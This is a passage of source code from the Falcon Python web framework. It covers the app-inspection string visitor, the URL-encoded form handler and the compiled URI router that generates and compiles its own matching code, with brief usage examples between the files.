class AppInfo(_Traversable):
"""Describes an application.
Args:
routes (List[RouteInfo]): The routes of the application.
middleware (MiddlewareInfo): The middleware information in the application.
static_routes (List[StaticRouteInfo]): The static routes of this application.
sinks (List[SinkInfo]): The sinks of this application.
error_handlers (List[ErrorHandlerInfo]): The error handlers of this application.
asgi (bool): Whether or not this is an ASGI application.
"""
__visit_name__ = 'app'
def __init__(
self,
routes: List[RouteInfo],
middleware: MiddlewareInfo,
static_routes: List[StaticRouteInfo],
sinks: List[SinkInfo],
error_handlers: List[ErrorHandlerInfo],
asgi: bool,
):
self.routes = routes
self.middleware = middleware
self.static_routes = static_routes
self.sinks = sinks
self.error_handlers = error_handlers
self.asgi = asgi
def to_string(self, verbose=False, internal=False, name='') -> str:
"""Return a string representation of this class.
Args:
verbose (bool, optional): Adds more information. Defaults to False.
internal (bool, optional): Also include internal falcon route methods
and error handlers. Defaults to ``False``.
name (str, optional): The name of the application, to be output at the
beginning of the text. Defaults to ``'Falcon App'``.
Returns:
str: A string representation of the application.
"""
return StringVisitor(verbose, internal, name).process(self)
# ------------------------------------------------------------------------
# Visitor classes
# ------------------------------------------------------------------------
class InspectVisitor:
"""Base visitor class that implements the `process` method.
Subclasses must implement ``visit_<name>`` methods for each supported class.
"""
def process(self, instance: _Traversable):
"""Process the instance, by calling the appropriate visit method.
Uses the `__visit_name__` attribute of the `instance` to obtain the method to use.
Args:
instance (_Traversable): The instance to process.
"""
try:
return getattr(self, 'visit_{}'.format(instance.__visit_name__))(instance)
except AttributeError as e:
raise RuntimeError(
'This visitor does not support {}'.format(type(instance))
) from e
class StringVisitor(InspectVisitor):
"""Visitor that returns a string representation of the info class.
This is used automatically by calling ``to_string()`` on the info class.
It can also be used directly by calling ``StringVisitor.process(info_instance)``.
Args:
verbose (bool, optional): Adds more information. Defaults to ``False``.
internal (bool, optional): Also include internal route methods
and error handlers added by the framework. Defaults to ``False``.
name (str, optional): The name of the application, to be output at the
beginning of the text. Defaults to ``'Falcon App'``.
"""
def __init__(self, verbose=False, internal=False, name=''):
self.verbose = verbose
self.internal = internal
self.name = name
self.indent = 0
@property
def tab(self):
"""Get the current tabulation."""
return ' ' * self.indent
def visit_route_method(self, route_method: RouteMethodInfo) -> str:
"""Visit a RouteMethodInfo instance. Usually called by `process`."""
text = '{0.method} - {0.function_name}'.format(route_method)
if self.verbose:
text += ' ({0.source_info})'.format(route_method)
return text
def _methods_to_string(self, methods: List):
"""Return a string from the list of methods."""
tab = self.tab + ' ' * 3
methods = _filter_internal(methods, self.internal)
if not methods:
return ''
text_list = [self.process(m) for m in methods]
method_text = ['{}├── {}'.format(tab, m) for m in text_list[:-1]]
method_text += ['{}└── {}'.format(tab, m) for m in text_list[-1:]]
return '\n'.join(method_text)
def visit_route(self, route: RouteInfo) -> str:
"""Visit a RouteInfo instance. Usually called by `process`."""
text = '{0}⇒ {1.path} - {1.class_name}'.format(self.tab, route)
if self.verbose:
text += ' ({0.source_info})'.format(route)
method_text = self._methods_to_string(route.methods)
if not method_text:
return text
return '{}:\n{}'.format(text, method_text)
def visit_static_route(self, static_route: StaticRouteInfo) -> str:
"""Visit a StaticRouteInfo instance. Usually called by `process`."""
text = '{0}↦ {1.prefix} {1.directory}'.format(self.tab, static_route)
if static_route.fallback_filename:
text += ' [{0.fallback_filename}]'.format(static_route)
return text
def visit_sink(self, sink: SinkInfo) -> str:
"""Visit a SinkInfo instance. Usually called by `process`."""
text = '{0}⇥ {1.prefix} {1.name}'.format(self.tab, sink)
if self.verbose:
text += ' ({0.source_info})'.format(sink)
return text
def visit_error_handler(self, error_handler: ErrorHandlerInfo) -> str:
"""Visit a ErrorHandlerInfo instance. Usually called by `process`."""
text = '{0}⇜ {1.error} {1.name}'.format(self.tab, error_handler)
if self.verbose:
text += ' ({0.source_info})'.format(error_handler)
return text
def visit_middleware_method(self, middleware_method: MiddlewareMethodInfo) -> str:
"""Visit a MiddlewareMethodInfo instance. Usually called by `process`."""
text = '{0.function_name}'.format(middleware_method)
if self.verbose:
text += ' ({0.source_info})'.format(middleware_method)
return text
def visit_middleware_class(self, middleware_class: MiddlewareClassInfo) -> str:
"""Visit a ErrorHandlerInfo instance. Usually called by `process`."""
text = '{0}↣ {1.name}'.format(self.tab, middleware_class)
if self.verbose:
text += ' ({0.source_info})'.format(middleware_class)
method_text = self._methods_to_string(middleware_class.methods)
if not method_text:
return text
return '{}:\n{}'.format(text, method_text)
def visit_middleware_tree_item(self, mti: MiddlewareTreeItemInfo) -> str:
"""Visit a MiddlewareTreeItemInfo instance. Usually called by `process`."""
symbol = mti._symbols.get(mti.name, '→')
return '{0}{1} {2.class_name}.{2.name}'.format(self.tab, symbol, mti)
def visit_middleware_tree(self, m_tree: MiddlewareTreeInfo) -> str:
"""Visit a MiddlewareTreeInfo instance. Usually called by `process`."""
before = len(m_tree.request) + len(m_tree.resource)
after = len(m_tree.response)
if before + after == 0:
return ''
each = 2
initial = self.indent
if after > before:
self.indent += each * (after - before)
text = []
for r in m_tree.request:
text.append(self.process(r))
self.indent += each
if text:
text.append('')
for r in m_tree.resource:
text.append(self.process(r))
self.indent += each
if m_tree.resource or not text:
text.append('')
self.indent += each
text.append('{}├── Process route responder'.format(self.tab))
self.indent -= each
if m_tree.response:
text.append('')
for r in m_tree.response:
self.indent -= each
text.append(self.process(r))
self.indent = initial
return '\n'.join(text)
def visit_middleware(self, middleware: MiddlewareInfo) -> str:
"""Visit a MiddlewareInfo instance. Usually called by `process`."""
text = self.process(middleware.middleware_tree)
if self.verbose:
self.indent += 4
m_text = '\n'.join(self.process(m) for m in middleware.middleware_classes)
self.indent -= 4
if m_text:
text += '\n{}- Middlewares classes:\n{}'.format(self.tab, m_text)
return text
def visit_app(self, app: AppInfo) -> str:
"""Visit a AppInfo instance. Usually called by `process`."""
type_ = 'ASGI' if app.asgi else 'WSGI'
self.indent = 4
text = '{} ({})'.format(self.name or 'Falcon App', type_)
if app.routes:
routes = '\n'.join(self.process(r) for r in app.routes)
text += '\n• Routes:\n{}'.format(routes)
middleware_text = self.process(app.middleware)
if middleware_text:
text += '\n• Middleware ({}):\n{}'.format(
app.middleware.independent_text, middleware_text
)
if app.static_routes:
static_routes = '\n'.join(self.process(sr) for sr in app.static_routes)
text += '\n• Static routes:\n{}'.format(static_routes)
if app.sinks:
sinks = '\n'.join(self.process(s) for s in app.sinks)
text += '\n• Sinks:\n{}'.format(sinks)
errors = _filter_internal(app.error_handlers, self.internal)
if errors:
errs = '\n'.join(self.process(e) for e in errors)
text += '\n• Error handlers:\n{}'.format(errs)
return text
# ------------------------------------------------------------------------
# Helpers functions
# ------------------------------------------------------------------------
def _get_source_info(obj, default='[unknown file]'):
"""Try to get the definition file and line of obj.
Return default on error.
"""
try:
source_file = inspect.getsourcefile(obj)
source_lines = inspect.findsource(obj)
source_info = '{}:{}'.format(source_file, source_lines[1])
except Exception:
# NOTE(vytas): If Falcon is cythonized, all default
# responders coming from cythonized modules will
# appear as built-in functions, and raise a
# TypeError when trying to locate the source file.
source_info = default
return source_info
def _get_source_info_and_name(obj):
"""Attempt to get the definition file and line of obj and its name."""
source_info = _get_source_info(obj, None)
if source_info is None:
# NOTE(caselit): a class instances return None. Try the type
source_info = _get_source_info(type(obj))
name = getattr(obj, '__name__', None)
if name is None:
name = getattr(type(obj), '__name__', '[unknown]')
return source_info, name
def _is_internal(obj):
"""Check if the module of the object is a falcon module."""
module = inspect.getmodule(obj)
if module:
return module.__name__.startswith('falcon.')
return False
def _filter_internal(iterable, return_internal):
"""Filter the internal elements of an iterable."""
if return_internal:
return iterable
return [el for el in iterable if not el.internal]
```
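A small sketch of how the public entry point above is typically used; the app and resource are illustrative.
```python
# Hypothetical usage: build a tiny app and print its inspected structure.
import falcon
from falcon.inspect import inspect_app

class HelloResource:
    def on_get(self, req, resp):
        resp.media = {'hello': 'world'}

app = falcon.App()
app.add_route('/hello', HelloResource())

info = inspect_app(app)              # returns an AppInfo instance
print(info.to_string(verbose=True))  # human-friendly tree of routes, middleware, handlers
```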
#### File: falcon/media/urlencoded.py
```python
from urllib.parse import urlencode
from falcon.media.base import BaseHandler
from falcon.util.uri import parse_query_string
class URLEncodedFormHandler(BaseHandler):
"""
URL-encoded form data handler.
This handler parses ``application/x-www-form-urlencoded`` HTML forms to a
``dict`` in a similar way that URL query parameters are parsed.
Keyword Arguments:
keep_blank (bool): Whether to keep empty-string values from the form
when deserializing.
        csv (bool): Whether to split comma-separated form values into a list
            when deserializing.
"""
def __init__(self, keep_blank=True, csv=False):
self.keep_blank = keep_blank
self.csv = csv
def serialize(self, media, content_type):
# NOTE(vytas): Setting doseq to True to mirror the parse_query_string
# behaviour.
return urlencode(media, doseq=True)
def deserialize(self, stream, content_type, content_length):
body = stream.read()
# NOTE(kgriffs): According to http://goo.gl/6rlcux the
# body should be US-ASCII. Enforcing this also helps
# catch malicious input.
body = body.decode('ascii')
return parse_query_string(body,
keep_blank=self.keep_blank,
csv=self.csv)
async def deserialize_async(self, stream, content_type, content_length):
body = await stream.read()
# NOTE(kgriffs): According to http://goo.gl/6rlcux the
# body should be US-ASCII. Enforcing this also helps
# catch malicious input.
body = body.decode('ascii')
return parse_query_string(body,
keep_blank=self.keep_blank,
csv=self.csv)
```
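A brief round-trip sketch of the handler above; the sample form data is illustrative, and the deserialized shape follows from `parse_query_string` collecting repeated keys into a list.
```python
# Hypothetical round trip through URLEncodedFormHandler.
import io

from falcon.media.urlencoded import URLEncodedFormHandler

handler = URLEncodedFormHandler()
encoded = handler.serialize({'name': 'falcon', 'tags': ['web', 'api']},
                            'application/x-www-form-urlencoded')
# e.g. 'name=falcon&tags=web&tags=api' (doseq=True expands the list)

decoded = handler.deserialize(io.BytesIO(encoded.encode('ascii')),
                              'application/x-www-form-urlencoded',
                              len(encoded))
# -> {'name': 'falcon', 'tags': ['web', 'api']}
```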
#### File: falcon/routing/compiled.py
```python
from collections import UserDict
from inspect import iscoroutinefunction
import keyword
import re
import textwrap
from threading import Lock
from falcon.routing import converters
from falcon.routing.util import map_http_methods, set_default_responders
from falcon.util.misc import is_python_func
from falcon.util.sync import _should_wrap_non_coroutines, wrap_sync_to_async
_TAB_STR = ' ' * 4
_FIELD_PATTERN = re.compile(
# NOTE(kgriffs): This disallows the use of the '}' character within
# an argstr. However, we don't really have a way of escaping
# curly brackets in URI templates at the moment, so users should
# see this as a similar restriction and so somewhat unsurprising.
#
# We may want to create a contextual parser at some point to
# work around this problem.
r'{((?P<fname>[^}:]*)((?P<cname_sep>:(?P<cname>[^}\(]*))(\((?P<argstr>[^}]*)\))?)?)}'
)
_IDENTIFIER_PATTERN = re.compile('[A-Za-z_][A-Za-z0-9_]*$')
class CompiledRouter:
"""Fast URI router which compiles its routing logic to Python code.
Generally you do not need to use this router class directly, as an
instance is created by default when the falcon.App class is initialized.
The router treats URI paths as a tree of URI segments and searches by
checking the URI one segment at a time. Instead of interpreting the route
tree for each look-up, it generates inlined, bespoke Python code to
perform the search, then compiles that code. This makes the route
processing quite fast.
The compilation process is delayed until the first use of the router (on the
first routed request) to reduce the time it takes to start the application.
This may noticeably delay the first response of the application when a large
number of routes have been added. When adding the last route
to the application a `compile` flag may be provided to force the router
to compile immediately, thus avoiding any delay for the first response.
Note:
When using a multi-threaded web server to host the application, it is
possible that multiple requests may be routed at the same time upon
startup. Therefore, the framework employs a lock to ensure that only a
single compilation of the decision tree is performed.
See also :meth:`.CompiledRouter.add_route`
"""
__slots__ = (
'_ast',
'_converter_map',
'_converters',
'_find',
'_finder_src',
'_options',
'_patterns',
'_return_values',
'_roots',
'_compile_lock',
)
def __init__(self):
self._ast = None
self._converters = None
self._finder_src = None
self._options = CompiledRouterOptions()
# PERF(kgriffs): This is usually an anti-pattern, but we do it
# here to reduce lookup time.
self._converter_map = self._options.converters.data
self._patterns = None
self._return_values = None
self._roots = []
# NOTE(caselit): set _find to the delayed compile method to ensure that
# compile is called when the router is first used
self._find = self._compile_and_find
self._compile_lock = Lock()
@property
def options(self):
return self._options
@property
def finder_src(self):
# NOTE(caselit): ensure that the router is actually compiled before
# returning the finder source, since the current value may be out of
# date
self.find('/')
return self._finder_src
def map_http_methods(self, resource, **kwargs):
"""Map HTTP methods (e.g., GET, POST) to methods of a resource object.
This method is called from :meth:`~.add_route` and may be overridden to
provide a custom mapping strategy.
Args:
resource (instance): Object which represents a REST resource.
The default maps the HTTP method ``GET`` to ``on_get()``,
``POST`` to ``on_post()``, etc. If any HTTP methods are not
supported by your resource, simply don't define the
corresponding request handlers, and Falcon will do the right
thing.
Keyword Args:
suffix (str): Optional responder name suffix for this route. If
a suffix is provided, Falcon will map GET requests to
``on_get_{suffix}()``, POST requests to ``on_post_{suffix}()``,
etc. In this way, multiple closely-related routes can be
mapped to the same resource. For example, a single resource
class can use suffixed responders to distinguish requests
for a single item vs. a collection of those same items.
Another class might use a suffixed responder to handle
a shortlink route in addition to the regular route for the
resource.
"""
return map_http_methods(resource, suffix=kwargs.get('suffix', None))
def add_route(self, uri_template, resource, **kwargs):
"""Add a route between a URI path template and a resource.
This method may be overridden to customize how a route is added.
Args:
uri_template (str): A URI template to use for the route
resource (object): The resource instance to associate with
the URI template.
Keyword Args:
suffix (str): Optional responder name suffix for this route. If
a suffix is provided, Falcon will map GET requests to
``on_get_{suffix}()``, POST requests to ``on_post_{suffix}()``,
etc. In this way, multiple closely-related routes can be
mapped to the same resource. For example, a single resource
class can use suffixed responders to distinguish requests
for a single item vs. a collection of those same items.
Another class might use a suffixed responder to handle
a shortlink route in addition to the regular route for the
resource.
compile (bool): Optional flag that can be used to compile the
routing logic on this call. By default, :class:`.CompiledRouter`
delays compilation until the first request is routed. This may
introduce a noticeable amount of latency when handling the first
request, especially when the application implements a large
number of routes. Setting `compile` to ``True`` when the last
route is added ensures that the first request will not be
delayed in this case (defaults to ``False``).
Note:
Always setting this flag to ``True`` may slow down the
addition of new routes when hundreds of them are added at
once. It is advisable to only set this flag to ``True`` when
adding the final route.
"""
# NOTE(kgriffs): falcon.asgi.App injects this private kwarg; it is
# only intended to be used internally.
asgi = kwargs.get('_asgi', False)
method_map = self.map_http_methods(resource, **kwargs)
set_default_responders(method_map, asgi=asgi)
if asgi:
self._require_coroutine_responders(method_map)
else:
self._require_non_coroutine_responders(method_map)
# NOTE(kgriffs): Fields may have whitespace in them, so sub
# those before checking the rest of the URI template.
if re.search(r'\s', _FIELD_PATTERN.sub('{FIELD}', uri_template)):
raise ValueError('URI templates may not include whitespace.')
path = uri_template.lstrip('/').split('/')
used_names = set()
for segment in path:
self._validate_template_segment(segment, used_names)
def insert(nodes, path_index=0):
for node in nodes:
segment = path[path_index]
if node.matches(segment):
path_index += 1
if path_index == len(path):
# NOTE(kgriffs): Override previous node
node.method_map = method_map
node.resource = resource
node.uri_template = uri_template
else:
insert(node.children, path_index)
return
if node.conflicts_with(segment):
msg = textwrap.dedent("""
The URI template for this route is inconsistent or conflicts with another
route's template. This is usually caused by configuring a field converter
differently for the same field in two different routes, or by using
different field names at the same level in the path (e.g.,
'/parents/{id}' and '/parents/{parent_id}/children')
""").strip().replace('\n', ' ')
raise ValueError(msg)
# NOTE(richardolsson): If we got this far, the node doesn't already
# exist and needs to be created. This builds a new branch of the
# routing tree recursively until it reaches the new node leaf.
new_node = CompiledRouterNode(path[path_index])
nodes.append(new_node)
if path_index == len(path) - 1:
new_node.method_map = method_map
new_node.resource = resource
new_node.uri_template = uri_template
else:
insert(new_node.children, path_index + 1)
insert(self._roots)
# NOTE(caselit): when compile is True run the actual compile step, otherwise reset the
# _find, so that _compile will be called on the next find use
if kwargs.get('compile', False):
self._find = self._compile()
else:
self._find = self._compile_and_find
def find(self, uri, req=None):
"""Search for a route that matches the given partial URI.
Args:
uri(str): The requested path to route.
Keyword Args:
req: The :class:`falcon.Request` or :class:`falcon.asgi.Request`
object that will be passed to the routed responder. Currently
the value of this argument is ignored by
:class:`~.CompiledRouter`. Routing is based solely on the path.
Returns:
tuple: A 4-member tuple composed of (resource, method_map,
params, uri_template), or ``None`` if no route matches
the requested path.
"""
path = uri.lstrip('/').split('/')
params = {}
node = self._find(path, self._return_values, self._patterns,
self._converters, params)
if node is not None:
return node.resource, node.method_map, params, node.uri_template
else:
return None
# -----------------------------------------------------------------
# Private
# -----------------------------------------------------------------
def _require_coroutine_responders(self, method_map):
for method, responder in method_map.items():
# NOTE(kgriffs): We don't simply wrap non-async functions
# since they likely perform relatively long blocking
# operations that need to be explicitly made non-blocking
# by the developer; raising an error helps highlight this
# issue.
if not iscoroutinefunction(responder) and is_python_func(responder):
if _should_wrap_non_coroutines():
def let(responder=responder):
method_map[method] = wrap_sync_to_async(responder)
let()
else:
msg = (
'The {} responder must be a non-blocking '
'async coroutine (i.e., defined using async def) to '
'avoid blocking the main request thread.'
)
msg = msg.format(responder)
raise TypeError(msg)
def _require_non_coroutine_responders(self, method_map):
for method, responder in method_map.items():
# NOTE(kgriffs): We don't simply wrap non-async functions
# since they likely perform relatively long blocking
# operations that need to be explicitly made non-blocking
# by the developer; raising an error helps highlight this
# issue.
if iscoroutinefunction(responder):
msg = (
'The {} responder must be a regular synchronous '
'method to be used with a WSGI app.'
)
msg = msg.format(responder)
raise TypeError(msg)
def _validate_template_segment(self, segment, used_names):
"""Validate a single path segment of a URI template.
1. Ensure field names are valid Python identifiers, since they
will be passed as kwargs to responders.
2. Check that there are no duplicate names, since that causes
(at least) the following problems:
a. For simple nodes, values from deeper nodes overwrite
values from more shallow nodes.
b. For complex nodes, re.compile() raises a nasty error
3. Check that when the converter syntax is used, the named
converter exists.
"""
for field in _FIELD_PATTERN.finditer(segment):
name = field.group('fname')
is_identifier = _IDENTIFIER_PATTERN.match(name)
if not is_identifier or name in keyword.kwlist:
msg_template = ('Field names must be valid identifiers '
'("{0}" is not valid)')
msg = msg_template.format(name)
raise ValueError(msg)
if name in used_names:
msg_template = ('Field names may not be duplicated '
'("{0}" was used more than once)')
msg = msg_template.format(name)
raise ValueError(msg)
used_names.add(name)
if field.group('cname_sep') == ':':
msg = 'Missing converter for field "{0}"'.format(name)
raise ValueError(msg)
name = field.group('cname')
if name:
if name not in self._converter_map:
msg = 'Unknown converter: "{0}"'.format(name)
raise ValueError(msg)
try:
self._instantiate_converter(self._converter_map[name], field.group('argstr'))
except Exception as e:
msg = 'Cannot instantiate converter "{}"'.format(name)
raise ValueError(msg) from e
def _generate_ast(self, nodes, parent, return_values, patterns, level=0, fast_return=True):
"""Generate a coarse AST for the router."""
# NOTE(kgriffs): Base case
if not nodes:
return
outer_parent = _CxIfPathLength('>', level)
parent.append_child(outer_parent)
parent = outer_parent
found_simple = False
# NOTE(kgriffs & philiptzou): Sort nodes in this sequence:
# static nodes(0), complex var nodes(1), and simple var nodes(2),
# so that none of them get masked.
nodes = sorted(
nodes, key=lambda node: node.is_var + (node.is_var and
not node.is_complex))
# NOTE(kgriffs): Down to this branch in the tree, we can do a
# fast 'return None'. See if the nodes at this branch are
# all still simple, meaning there is only one possible path.
if fast_return:
if len(nodes) > 1:
# NOTE(kgriffs): There's the possibility of more than
# one path.
var_nodes = [node for node in nodes if node.is_var]
found_var_nodes = bool(var_nodes)
fast_return = not found_var_nodes
for node in nodes:
if node.is_var:
if node.is_complex:
# NOTE(richardolsson): Complex nodes are nodes which
# contain anything more than a single literal or variable,
# and they need to be checked using a pre-compiled regular
# expression.
pattern_idx = len(patterns)
patterns.append(node.var_pattern)
construct = _CxIfPathSegmentPattern(level, pattern_idx,
node.var_pattern.pattern)
parent.append_child(construct)
parent = construct
if node.var_converter_map:
parent.append_child(_CxPrefetchGroupsFromPatternMatch())
parent = self._generate_conversion_ast(parent, node)
else:
parent.append_child(_CxSetParamsFromPatternMatch())
else:
# NOTE(kgriffs): Simple nodes just capture the entire path
# segment as the value for the param.
if node.var_converter_map:
assert len(node.var_converter_map) == 1
parent.append_child(_CxSetFragmentFromPath(level))
field_name = node.var_name
__, converter_name, converter_argstr = node.var_converter_map[0]
converter_class = self._converter_map[converter_name]
converter_obj = self._instantiate_converter(
converter_class,
converter_argstr
)
converter_idx = len(self._converters)
self._converters.append(converter_obj)
construct = _CxIfConverterField(
field_name,
converter_idx,
)
parent.append_child(construct)
parent = construct
else:
parent.append_child(_CxSetParam(node.var_name, level))
# NOTE(kgriffs): We don't allow multiple simple var nodes
# to exist at the same level, e.g.:
#
# /foo/{id}/bar
# /foo/{name}/bar
#
assert len([_node for _node in nodes
if _node.is_var and not _node.is_complex]) == 1
found_simple = True
else:
# NOTE(kgriffs): Not a param, so must match exactly
construct = _CxIfPathSegmentLiteral(level, node.raw_segment)
parent.append_child(construct)
parent = construct
if node.resource is not None:
# NOTE(kgriffs): This is a valid route, so we will want to
# return the relevant information.
resource_idx = len(return_values)
return_values.append(node)
self._generate_ast(
node.children,
parent,
return_values,
patterns,
level + 1,
fast_return
)
if node.resource is None:
if fast_return:
parent.append_child(_CxReturnNone())
else:
# NOTE(kgriffs): Make sure that we have consumed all of
# the segments for the requested route; otherwise we could
# mistakenly match "/foo/23/bar" against "/foo/{id}".
construct = _CxIfPathLength('==', level + 1)
construct.append_child(_CxReturnValue(resource_idx))
parent.append_child(construct)
if fast_return:
parent.append_child(_CxReturnNone())
parent = outer_parent
if not found_simple and fast_return:
parent.append_child(_CxReturnNone())
def _generate_conversion_ast(self, parent, node):
# NOTE(kgriffs): Unroll the converter loop into
# a series of nested "if" constructs.
for field_name, converter_name, converter_argstr in node.var_converter_map:
converter_class = self._converter_map[converter_name]
converter_obj = self._instantiate_converter(
converter_class,
converter_argstr
)
converter_idx = len(self._converters)
self._converters.append(converter_obj)
parent.append_child(_CxSetFragmentFromField(field_name))
construct = _CxIfConverterField(
field_name,
converter_idx,
)
parent.append_child(construct)
parent = construct
# NOTE(kgriffs): Add remaining fields that were not
# converted, if any.
if node.num_fields > len(node.var_converter_map):
parent.append_child(_CxSetParamsFromPatternMatchPrefetched())
return parent
def _compile(self):
"""Generate Python code for the entire routing tree.
The generated code is compiled and the resulting Python method
is returned.
"""
src_lines = [
'def find(path, return_values, patterns, converters, params):',
_TAB_STR + 'path_len = len(path)',
]
self._return_values = []
self._patterns = []
self._converters = []
self._ast = _CxParent()
self._generate_ast(
self._roots,
self._ast,
self._return_values,
self._patterns
)
src_lines.append(self._ast.src(0))
src_lines.append(
# PERF(kgriffs): Explicit return of None is faster than implicit
_TAB_STR + 'return None'
)
self._finder_src = '\n'.join(src_lines)
scope = {}
exec(compile(self._finder_src, '<string>', 'exec'), scope)
return scope['find']
def _instantiate_converter(self, klass, argstr=None):
if argstr is None:
return klass()
# NOTE(kgriffs): Don't try this at home. ;)
src = '{0}({1})'.format(klass.__name__, argstr)
return eval(src, {klass.__name__: klass})
def _compile_and_find(self, path, _return_values, _patterns, _converters, params):
"""Compile the router, set the `_find` attribute and return its result.
This method is set to the `_find` attribute to delay the compilation of the
router until it's used for the first time. Subsequent calls to `_find` will
be processed by the actual routing function.
This method must have the same signature as the function returned by
:meth:`.CompiledRouter._compile`.
"""
with self._compile_lock:
if self._find == self._compile_and_find:
# NOTE(caselit): replace the find with the result of the router compilation
self._find = self._compile()
# NOTE(caselit): return_values, patterns, converters are reset by the _compile
# method, so the updated ones must be used
return self._find(
path, self._return_values, self._patterns, self._converters, params
)
class CompiledRouterNode:
"""Represents a single URI segment in a URI."""
def __init__(self, raw_segment,
method_map=None, resource=None, uri_template=None):
self.children = []
self.raw_segment = raw_segment
self.method_map = method_map
self.resource = resource
self.uri_template = uri_template
self.is_var = False
self.is_complex = False
self.num_fields = 0
# TODO(kgriffs): Rename these since the docs talk about "fields"
# or "field expressions", not "vars" or "variables".
self.var_name = None
self.var_pattern = None
self.var_converter_map = []
# NOTE(kgriffs): CompiledRouter.add_route validates field names,
# so here we can just assume they are OK and use the simple
# _FIELD_PATTERN to match them.
matches = list(_FIELD_PATTERN.finditer(raw_segment))
if not matches:
self.is_var = False
else:
self.is_var = True
self.num_fields = len(matches)
for field in matches:
# NOTE(kgriffs): We already validated the field
# expression to disallow blank converter names, or names
# that don't match a known converter, so if a name is
# given, we can just go ahead and use it.
if field.group('cname'):
self.var_converter_map.append(
(
field.group('fname'),
field.group('cname'),
field.group('argstr'),
)
)
if matches[0].span() == (0, len(raw_segment)):
# NOTE(kgriffs): Single field, spans entire segment
assert len(matches) == 1
# TODO(kgriffs): It is not "complex" because it only
# contains a single field. Rename this variable to make
# it more descriptive.
self.is_complex = False
field = matches[0]
self.var_name = field.group('fname')
else:
# NOTE(richardolsson): Complex segments need to be
# converted into regular expressions in order to match
# and extract variable values. The regular expressions
# contain both literal spans and named group expressions
# for the variables.
# NOTE(kgriffs): Don't use re.escape() since we do not
# want to escape '{' or '}', and we don't want to
# introduce any unexpected side-effects by escaping
# non-ASCII characters (it is probably safe, but let's
# not take that chance in a minor point release).
#
# NOTE(kgriffs): The substitution template parser in the
# re library does not look ahead when collapsing '\\':
# therefore in the case of r'\\g<0>' the first r'\\'
# would be consumed and collapsed to r'\', and then the
# parser would examine 'g<0>' and not realize it is a
# group-escape sequence. So we add an extra backslash to
# trick the parser into doing the right thing.
escaped_segment = re.sub(r'[\.\(\)\[\]\?\$\*\+\^\|]', r'\\\g<0>', raw_segment)
pattern_text = _FIELD_PATTERN.sub(r'(?P<\2>.+)', escaped_segment)
pattern_text = '^' + pattern_text + '$'
self.is_complex = True
self.var_pattern = re.compile(pattern_text)
if self.is_complex:
assert self.is_var
def matches(self, segment):
"""Return True if this node matches the supplied template segment."""
return segment == self.raw_segment
def conflicts_with(self, segment):
"""Return True if this node conflicts with a given template segment."""
# NOTE(kgriffs): This method assumes that the caller has already
# checked if the segment matches. By definition, only unmatched
# segments may conflict, so there isn't any sense in calling
# conflicts_with in that case.
assert not self.matches(segment)
# NOTE(kgriffs): Possible combinations are as follows.
#
# simple, simple ==> True
# simple, complex ==> False
# simple, string ==> False
# complex, simple ==> False
# complex, complex ==> (Maybe)
# complex, string ==> False
# string, simple ==> False
# string, complex ==> False
# string, string ==> False
#
other = CompiledRouterNode(segment)
if self.is_var:
# NOTE(kgriffs & philiptzou): Falcon does not allow multiple
# simple var nodes to exist at the same level, as in the following:
#
# /foo/{thing1}
# /foo/{thing2}
#
# Nor two complex nodes like this:
#
# /foo/{thing1}.{ext}
# /foo/{thing2}.{ext}
#
# On the other hand, those are all OK:
#
# /foo/{thing1}
# /foo/all
# /foo/{thing1}.{ext}
# /foo/{thing2}.detail.{ext}
#
if self.is_complex:
if other.is_complex:
return (_FIELD_PATTERN.sub('v', self.raw_segment) ==
_FIELD_PATTERN.sub('v', segment))
return False
else:
return other.is_var and not other.is_complex
# NOTE(kgriffs): If self is a static string match, then all the cases
# for other are False, so no need to check.
return False
class ConverterDict(UserDict):
"""A dict-like class for storing field converters."""
def update(self, other):
try:
# NOTE(kgriffs): If it is a mapping type, it should
# implement keys().
names = other.keys()
except AttributeError:
# NOTE(kgriffs): Not a mapping type, so assume it is an
# iterable of 2-item iterables. But we need to make it
# re-iterable if it is a generator, for when we pass
# it on to the parent's update().
other = list(other)
names = [n for n, __ in other]
for n in names:
self._validate(n)
UserDict.update(self, other)
def __setitem__(self, name, converter):
self._validate(name)
UserDict.__setitem__(self, name, converter)
def _validate(self, name):
if not _IDENTIFIER_PATTERN.match(name):
raise ValueError(
'Invalid converter name. Names may not be blank, and may '
'only use ASCII letters, digits, and underscores. Names '
'must begin with a letter or underscore.'
)
class CompiledRouterOptions:
"""Defines a set of configurable router options.
An instance of this class is exposed via :py:attr:`falcon.App.router_options`
and :py:attr:`falcon.asgi.App.router_options` for configuring certain
:py:class:`~.CompiledRouter` behaviors.
Attributes:
converters: Represents the collection of named
converters that may be referenced in URI template field
expressions. Adding additional converters is simply a
matter of mapping an identifier to a converter class::
app.router_options.converters['mc'] = MyConverter
The identifier can then be used to employ the converter
within a URI template::
app.add_route('/{some_field:mc}', some_resource)
Converter names may only contain ASCII letters, digits,
and underscores, and must start with either a letter or
an underscore.
Warning:
Converter instances are shared between requests.
Therefore, in threaded deployments, care must be taken
to implement custom converters in a thread-safe
manner.
(See also: :ref:`Field Converters <routing_field_converters>`)
"""
__slots__ = ('converters',)
def __init__(self):
self.converters = ConverterDict(
(name, converter) for name, converter in converters.BUILTIN
)
# --------------------------------------------------------------------
# AST Constructs
#
# NOTE(kgriffs): These constructs are used to create a very coarse
# AST that can then be used to generate Python source code for the
# router. Using an AST like this makes it easier to reason about
# the compilation process, and affords syntactical transformations
# that would otherwise be at best confusing and at worst extremely
# tedious and error-prone if they were to be attempted directly
# against the Python source code.
# --------------------------------------------------------------------
class _CxParent:
def __init__(self):
self._children = []
def append_child(self, construct):
self._children.append(construct)
def src(self, indentation):
return self._children_src(indentation + 1)
def _children_src(self, indentation):
src_lines = [
child.src(indentation)
for child in self._children
]
return '\n'.join(src_lines)
class _CxIfPathLength(_CxParent):
def __init__(self, comparison, length):
super(_CxIfPathLength, self).__init__()
self._comparison = comparison
self._length = length
def src(self, indentation):
template = '{0}if path_len {1} {2}:\n{3}'
return template.format(
_TAB_STR * indentation,
self._comparison,
self._length,
self._children_src(indentation + 1)
)
class _CxIfPathSegmentLiteral(_CxParent):
def __init__(self, segment_idx, literal):
super(_CxIfPathSegmentLiteral, self).__init__()
self._segment_idx = segment_idx
self._literal = literal
def src(self, indentation):
template = "{0}if path[{1}] == '{2}':\n{3}"
return template.format(
_TAB_STR * indentation,
self._segment_idx,
self._literal,
self._children_src(indentation + 1)
)
class _CxIfPathSegmentPattern(_CxParent):
def __init__(self, segment_idx, pattern_idx, pattern_text):
super(_CxIfPathSegmentPattern, self).__init__()
self._segment_idx = segment_idx
self._pattern_idx = pattern_idx
self._pattern_text = pattern_text
def src(self, indentation):
lines = [
